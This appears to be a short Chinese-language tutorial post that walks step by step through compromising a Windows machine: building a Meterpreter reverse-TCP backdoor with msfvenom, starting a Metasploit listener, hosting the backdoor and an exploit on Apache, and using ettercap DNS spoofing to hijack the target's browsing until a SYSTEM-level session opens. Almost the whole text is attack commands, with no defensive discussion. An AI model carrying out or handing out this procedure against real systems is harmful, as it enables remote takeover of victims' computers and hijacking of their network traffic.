| 
 1、生成后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.146.142 LPORT=6666 -f exe -o /sss.exe  
  
 
 2、启动msf,选择exp:use exploit/multi/handler  
  
 
 3、设置负荷:set payload windows/meterpreter/reverse_tcp show options 查看需要设置的参数  
  
 
 4、set LHOST设置IP  
  
 
5、set LPORT设置监听端口  
  
  
 
 6、再show options看一下参数是否设置正确  
  
 
 7、然后执行exploit  
 
 
 8、Msf里面设置完成过后我们设置dns劫持,把之前生成的后门放到/var/www/目录下面,然后打开K8 生成EXP  
  
 
 9、再把EXP复制到/var/www/目录下面  
  
 
  
 10、重启apache: service apache2 restart  
  
 
  
 11、修改ettercap DNS劫持插件的参数:leafpad /etc/ettercap/etter.dns  
  
 
 12、然后执行以下命令启动DNS劫持 DNS劫持:ettercap -T -q -i xxxx -P dns_spoof // //  
  
 
 13、靶机打开IE浏览器*.com的所以网站全部被劫持  
  
 
 14、回到msf查看是否上线  
  
 
  
 已经上线,并且是system权限  
  
 |